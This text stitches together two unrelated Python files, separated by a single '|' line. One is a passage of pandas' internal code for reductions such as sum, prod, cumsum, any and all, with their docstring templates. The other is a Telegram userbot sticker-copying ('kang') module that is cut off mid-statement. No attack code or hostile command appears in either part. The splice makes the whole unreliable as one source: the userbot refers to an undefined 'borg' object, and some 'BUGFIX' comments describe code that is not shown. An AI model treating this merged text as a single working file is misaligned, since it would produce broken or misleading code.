    return self._find_valid_index("first")
@Appender(
    _shared_docs["valid_index"] % {"position": "last", "klass": "Series/DataFrame"}
)
def last_valid_index(self):
    # Delegate to the shared first/last valid-value lookup helper.
    return self._find_valid_index("last")
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = (
f"{{{', '.join(f'{a} ({i})' for i, a in enumerate(cls._AXIS_ORDERS))}}}"
)
name = cls._constructor_sliced.__name__ if cls._AXIS_LEN > 1 else "scalar"
name2 = cls.__name__
return axis_descr, name, name2
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
**kwargs
Additional keyword arguments to be passed to the function.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_doc_mad = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
Axis for the function to be applied on.
skipna : bool, default None
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
Returns
-------
%(name1)s or %(name2)s (if level specified)\
%(see_also)s\
%(examples)s
"""
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : bool, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
%(name1)s or %(name2)s (if level specified)\n"""
_bool_doc = """
%(desc)s
Parameters
----------
axis : {0 or 'index', 1 or 'columns', None}, default 0
Indicate which axis or axes should be reduced.
* 0 / 'index' : reduce the index, return a Series whose index is the
original column labels.
* 1 / 'columns' : reduce the columns, return a Series whose index is the
original index.
* None : reduce all axes, return a scalar.
bool_only : bool, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
skipna : bool, default True
Exclude NA/null values. If the entire row/column is NA and skipna is
True, then the result will be %(empty_value)s, as for an empty row/column.
If skipna is False, then NA are treated as True, because these are not
equal to zero.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
If level is specified, then, %(name2)s is returned; otherwise, %(name1)s
is returned.
%(see_also)s
%(examples)s"""
_all_desc = """\
Return whether all elements are True, potentially over an axis.
Returns True unless there at least one element within a series or
along a Dataframe axis that is False or equivalent (e.g. zero or
empty)."""
_all_examples = """\
Examples
--------
**Series**
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
>>> pd.Series([]).all()
True
>>> pd.Series([np.nan]).all()
True
>>> pd.Series([np.nan]).all(skipna=False)
True
**DataFrames**
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Specify ``axis='columns'`` to check if row-wise values all return True.
>>> df.all(axis='columns')
0 True
1 False
dtype: bool
Or ``axis=None`` for whether every value is True.
>>> df.all(axis=None)
False
"""
_all_see_also = """\
See Also
--------
Series.all : Return True if all elements are True.
DataFrame.any : Return True if one (or more) elements are True.
"""
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(name1)s or %(name2)s
See Also
--------
core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
%(examples)s"""
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
_any_see_also = """\
See Also
--------
numpy.any : Numpy version of this method.
Series.any : Return whether any element is True.
Series.all : Return whether all elements are True.
DataFrame.any : Return whether any element is True over requested axis.
DataFrame.all : Return whether all elements are True over requested axis.
"""
_any_desc = """\
Return whether any element is True, potentially over an axis.
Returns False unless there at least one element within a series or
along a Dataframe axis that is True or equivalent (e.g. non-zero or
non-empty)."""
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([False, False]).any()
False
>>> pd.Series([True, False]).any()
True
>>> pd.Series([]).any()
False
>>> pd.Series([np.nan]).any()
False
>>> pd.Series([np.nan]).any(skipna=False)
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
Aggregating over the entire DataFrame with ``axis=None``.
>>> df.any(axis=None)
True
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
_shared_docs[
"stat_func_example"
] = """
Examples
--------
>>> idx = pd.MultiIndex.from_arrays([
... ['warm', 'warm', 'cold', 'cold'],
... ['dog', 'falcon', 'fish', 'spider']],
... names=['blooded', 'animal'])
>>> s = pd.Series([4, 2, 0, 8], name='legs', index=idx)
>>> s
blooded animal
warm dog 4
falcon 2
cold fish 0
spider 8
Name: legs, dtype: int64
>>> s.{stat_func}()
{default_output}
{verb} using level names, as well as indices.
>>> s.{stat_func}(level='blooded')
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64
>>> s.{stat_func}(level=0)
blooded
warm {level_output_0}
cold {level_output_1}
Name: legs, dtype: int64"""
_sum_examples = _shared_docs["stat_func_example"].format(
stat_func="sum", verb="Sum", default_output=14, level_output_0=6, level_output_1=8
)
_sum_examples += """
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan"""
_max_examples = _shared_docs["stat_func_example"].format(
stat_func="max", verb="Max", default_output=8, level_output_0=4, level_output_1=8
)
_min_examples = _shared_docs["stat_func_example"].format(
stat_func="min", verb="Min", default_output=0, level_output_0=2, level_output_1=0
)
_stat_func_see_also = """
See Also
--------
Series.sum : Return the sum.
Series.min : Return the minimum.
Series.max : Return the maximum.
Series.idxmin : Return the index of the minimum.
Series.idxmax : Return the index of the maximum.
DataFrame.sum : Return the sum over the requested axis.
DataFrame.min : Return the minimum over the requested axis.
DataFrame.max : Return the maximum over the requested axis.
DataFrame.idxmin : Return the index of the minimum over the requested axis.
DataFrame.idxmax : Return the index of the maximum over the requested axis."""
_prod_examples = """
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan"""
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded:: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
    """
    Build a reduction method (e.g. sum/prod) that honours ``min_count``
    and return it renamed as *name* for attachment to *cls*.
    """

    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        min_count=_min_count_stub,
        see_also=see_also,
        examples=examples,
    )
    @Appender(_num_doc)
    def stat_func(
        self,
        axis=None,
        skipna=None,
        level=None,
        numeric_only=None,
        min_count=0,
        **kwargs,
    ):
        # numpy-compat validation; each reducer has a dedicated checker.
        if name == "sum":
            nv.validate_sum((), kwargs)
        elif name == "prod":
            nv.validate_prod((), kwargs)
        else:
            nv.validate_stat_func((), kwargs, fname=name)

        skipna = True if skipna is None else skipna
        axis = self._stat_axis_number if axis is None else axis

        if level is None:
            return self._reduce(
                f,
                name,
                axis=axis,
                skipna=skipna,
                numeric_only=numeric_only,
                min_count=min_count,
            )
        # A level was requested: aggregate group-wise over that level.
        return self._agg_by_level(
            name, axis=axis, level=level, skipna=skipna, min_count=min_count
        )

    return set_function_name(stat_func, name, cls)
def _make_stat_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also: str = "", examples: str = ""
):
    """
    Build a plain reduction method (e.g. mean/median) and return it
    renamed as *name* for attachment to *cls*.
    """

    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        min_count="",
        see_also=see_also,
        examples=examples,
    )
    @Appender(_num_doc)
    def stat_func(
        self, axis=None, skipna=None, level=None, numeric_only=None, **kwargs
    ):
        # numpy-compat validation; median has its own signature checker.
        if name == "median":
            nv.validate_median((), kwargs)
        else:
            nv.validate_stat_func((), kwargs, fname=name)

        skipna = True if skipna is None else skipna
        axis = self._stat_axis_number if axis is None else axis

        if level is None:
            return self._reduce(
                f, name, axis=axis, skipna=skipna, numeric_only=numeric_only
            )
        return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)

    return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
    """
    Build a dispersion reduction (std/var/sem) that accepts ``ddof`` and
    return it renamed as *name* for attachment to *cls*.
    """

    @Substitution(desc=desc, name1=name1, name2=name2, axis_descr=axis_descr)
    @Appender(_num_ddof_doc)
    def stat_func(
        self, axis=None, skipna=None, level=None, ddof=1, numeric_only=None, **kwargs
    ):
        nv.validate_stat_ddof_func((), kwargs, fname=name)
        skipna = True if skipna is None else skipna
        axis = self._stat_axis_number if axis is None else axis
        if level is None:
            return self._reduce(
                f, name, axis=axis, numeric_only=numeric_only, skipna=skipna, ddof=ddof
            )
        return self._agg_by_level(
            name, axis=axis, level=level, skipna=skipna, ddof=ddof
        )

    return set_function_name(stat_func, name, cls)
def _make_cum_function(
    cls,
    name,
    name1,
    name2,
    axis_descr,
    desc,
    accum_func,
    accum_func_name,
    mask_a,
    mask_b,
    examples,
):
    """
    Build a cumulative method (cumsum/cumprod/cummin/cummax) named *name*
    for *cls*, documented via the shared ``_cnum_doc`` template.

    Parameters
    ----------
    accum_func : callable
        The numpy accumulation function (e.g. ``np.minimum.accumulate``).
    mask_a, mask_b : scalar
        Fill values used to neutralise NAs before accumulating (mask_a)
        and to restore them in the result afterwards (mask_b) when
        ``skipna=True``.
    """

    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        accum_func_name=accum_func_name,
        examples=examples,
    )
    @Appender(_cnum_doc)
    def cum_func(self, axis=None, skipna=True, *args, **kwargs):
        skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
        if axis is None:
            axis = self._stat_axis_number
        else:
            axis = self._get_axis_number(axis)

        if axis == 1:
            # Column-wise: transpose, accumulate along axis 0, transpose back.
            return cum_func(self.T, axis=0, skipna=skipna, *args, **kwargs).T

        def na_accum_func(blk_values):
            # We will be applying this function to block values
            if blk_values.dtype.kind in ["m", "M"]:
                # datetime-like values: accumulate on the i8 view.
                # GH#30460, GH#29058
                # numpy 1.18 started sorting NaTs at the end instead of beginning,
                # so we need to work around to maintain backwards-consistency.
                orig_dtype = blk_values.dtype

                # We need to define mask before masking NaTs
                mask = isna(blk_values)

                if accum_func == np.minimum.accumulate:
                    # Note: the accum_func comparison fails as an "is" comparison
                    y = blk_values.view("i8")
                    y[mask] = np.iinfo(np.int64).max
                    changed = True
                else:
                    y = blk_values
                    changed = False

                result = accum_func(y.view("i8"), axis)
                if skipna:
                    np.putmask(result, mask, iNaT)
                elif accum_func == np.minimum.accumulate:
                    # Restore NaTs that we masked previously
                    nz = (~np.asarray(mask)).nonzero()[0]
                    if len(nz):
                        # everything up to the first non-na entry stays NaT
                        result[: nz[0]] = iNaT

                if changed:
                    # restore NaT elements
                    y[mask] = iNaT  # TODO: could try/finally for this?

                if isinstance(blk_values, np.ndarray):
                    result = result.view(orig_dtype)
                else:
                    # DatetimeArray
                    result = type(blk_values)._from_sequence(result, dtype=orig_dtype)

            elif skipna and not issubclass(
                blk_values.dtype.type, (np.integer, np.bool_)
            ):
                # float-like with skipna: mask NAs out before accumulating,
                # then write them back into the result.
                vals = blk_values.copy().T
                mask = isna(vals)
                np.putmask(vals, mask, mask_a)
                result = accum_func(vals, axis)
                np.putmask(result, mask, mask_b)
            else:
                result = accum_func(blk_values.T, axis)

            # transpose back for ndarray, not for EA
            return result.T if hasattr(result, "T") else result

        result = self._data.apply(na_accum_func)

        d = self._construct_axes_dict()
        d["copy"] = False
        return self._constructor(result, **d).__finalize__(self)

    return set_function_name(cum_func, name, cls)
def _make_logical_function(
    cls, name, name1, name2, axis_descr, desc, f, see_also, examples, empty_value
):
    """
    Build a boolean reduction (any/all) and return it renamed as *name*
    for attachment to *cls*.
    """

    @Substitution(
        desc=desc,
        name1=name1,
        name2=name2,
        axis_descr=axis_descr,
        see_also=see_also,
        examples=examples,
        empty_value=empty_value,
    )
    @Appender(_bool_doc)
    def logical_func(self, axis=0, bool_only=None, skipna=True, level=None, **kwargs):
        nv.validate_logical_func((), kwargs, fname=name)
        if level is None:
            return self._reduce(
                f,
                name,
                axis=axis,
                skipna=skipna,
                numeric_only=bool_only,
                filter_type="bool",
            )
        if bool_only is not None:
            raise NotImplementedError(
                "Option bool_only is not implemented with option level."
            )
        return self._agg_by_level(name, axis=axis, level=level, skipna=skipna)

    return set_function_name(logical_func, name, cls)
|
# Copyright (C) 2019 The Raphielscape Company LLC.
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.utils import admin_cmd
import emoji
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Status messages shown (picked at random) while a sticker is being kanged.
KANGING_STR = [
    "Using Witchery to kang this sticker...",
    "Plagiarising hehe...",
    "Inviting this sticker over to my pack...",
    "Kanging this sticker...",
    "Hey that's a nice sticker!\nMind if I kang?!..",
    "hehe me stel ur stikér\nhehe.",
    "Ay look over there (☉。☉)!→\nWhile I kang this...",
    "Roses are red violets are blue, kanging this sticker so my pacc looks cool",
    "Imprisoning this sticker...",
    "Mr.Steal Your Sticker is stealing this sticker... ",
]
@borg.on(admin_cmd(pattern="kang ?(.*)"))
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones. """
    user = await bot.get_me()
    if not user.username:
        # No public username: reuse the first name when it is plain ASCII,
        # otherwise fall back to a synthetic id-based name.
        try:
            user.first_name.encode('utf-8').decode('ascii')
            user.username = user.first_name
        except UnicodeDecodeError:
            user.username = f"cat_{user.id}"
    message = await args.get_reply_message()
    photo = None
    emojibypass = False
    is_anim = False
    emoji = None
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Re-kanged webp sticker: reuse its original emoji.
                emoji = message.media.document.attributes[1].alt
                emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
                    emojibypass = True
            is_anim = True
            photo = 1
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    if photo:
        # Parse optional "[emoji] [pack-number]" arguments (either order).
        splat = args.text.split()
        if not emojibypass:
            emoji = "😂"
        pack = 1
        if len(splat) == 3:
            if char_is_emoji(splat[1]):
                pack = splat[2]  # User sent both
                emoji = splat[1]
            elif char_is_emoji(splat[2]):
                pack = splat[1]  # User sent both
                emoji = splat[2]
            else:
                await args.edit("check `.info stickers`")
                return
        elif len(splat) == 2:
            if char_is_emoji(splat[1]):
                emoji = splat[1]
            else:
                pack = splat[1]
        packname = f"{user.username}_{pack}"
        packnick = f"@{user.username}'s_{pack}"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # Probe the public pack page to learn whether the pack exists.
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append this sticker to it.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                while "Whoa! That's probably enough stickers for one pack, give it a break" in x.text:
                    # Pack is full: roll over to the next numbered pack.
                    # BUGFIX: `pack` may be the int default or a numeric
                    # string from user input; the old `pack.isnumeric()`
                    # raised AttributeError on ints and `pack += 1` raised
                    # TypeError on strings. Normalise first.
                    if str(pack).isnumeric():
                        pack = int(pack) + 1
                    else:
                        pack = 1
                    packname = f"{user.username}_{pack}"
                    packnick = f"@{user.username}'s_{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # The rolled-over pack doesn't exist yet: create it.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
                            await conv.send_file(file, force_document=True)
                        rsp = await conv.get_response()
                        if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                            await bot.send_read_acknowledge(conv.chat_id)
                            # BUGFIX: was `rsp.txt`, which raised AttributeError.
                            await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                            return
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"Sticker added in a Different Pack !\
\nThis Pack is Newly created!\
\nYour pack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker added is {emoji}",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                    await bot.send_read_acknowledge(conv.chat_id)
                    await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack does not exist yet: create it from scratch.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "You can list several emoji in one message, but I recommend using no more than two per sticker" not in rsp.text:
                    # CONSISTENCY FIX: report rsp.text like the other branches
                    # (was the raw Message object repr).
                    await args.edit(f"Failed to add sticker, use @Stickers bot to add the sticker manually.\n**error :**{rsp.text}")
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        await args.edit(f"Sticker kanged successfully!\
\nPack can be found [here](t.me/addstickers/{packname}) and emoji of the sticker is {emoji}",
                        parse_mode='md')
async def resize_photo(photo):
    """
    Resize the given photo so it fits within 512x512 (Telegram sticker
    dimensions), preserving the aspect ratio.

    BUGFIX: the old test ``(image.width and image.height) < 512`` only
    compared the height (``and`` yields its second operand), not both
    dimensions as intended.
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    if image.width < 512 and image.height < 512:
        # Small image: scale up so the larger side becomes exactly 512.
        scale = 512 / max(image.width, image.height)
        new_size = (math.floor(image.width * scale),
                    math.floor(image.height * scale))
        image = image.resize(new_size)
    else:
        # Large image: shrink in place, keeping the aspect ratio.
        image.thumbnail(maxsize)
    return image
def char_is_emoji(character):
    """Return True when *character* appears in the emoji lookup table."""
    known_emoji = emoji.UNICODE_EMOJI
    return character in known_emoji
@borg.on(admin_cmd(pattern="stkrinfo$"))
async def get_pack_info(event):
    """ For .stkrinfo: reply to a sticker to fetch its pack's details. """
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    rep_msg = await event.get_reply_message()
    if not rep_msg.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        stickerset_attr = rep_msg.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(stickerset_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    get_stickerset = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=stickerset_attr.stickerset.id,
                access_hash=stickerset_attr.stickerset.access_hash)))
    # Collect distinct emojis in first-seen order.
    pack_emojis = []
    for document_sticker in get_stickerset.packs:
        if document_sticker.emoticon not in pack_emojis:
            pack_emojis.append(document_sticker.emoticon)
    # BUGFIX: the emoji join used double quotes inside a double-quoted
    # f-string, a SyntaxError on Python < 3.12; use single quotes.
    OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
             f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
             f"**Official:** `{get_stickerset.set.official}`\n" \
             f"**Archived:** `{get_stickerset.set.archived}`\n" \
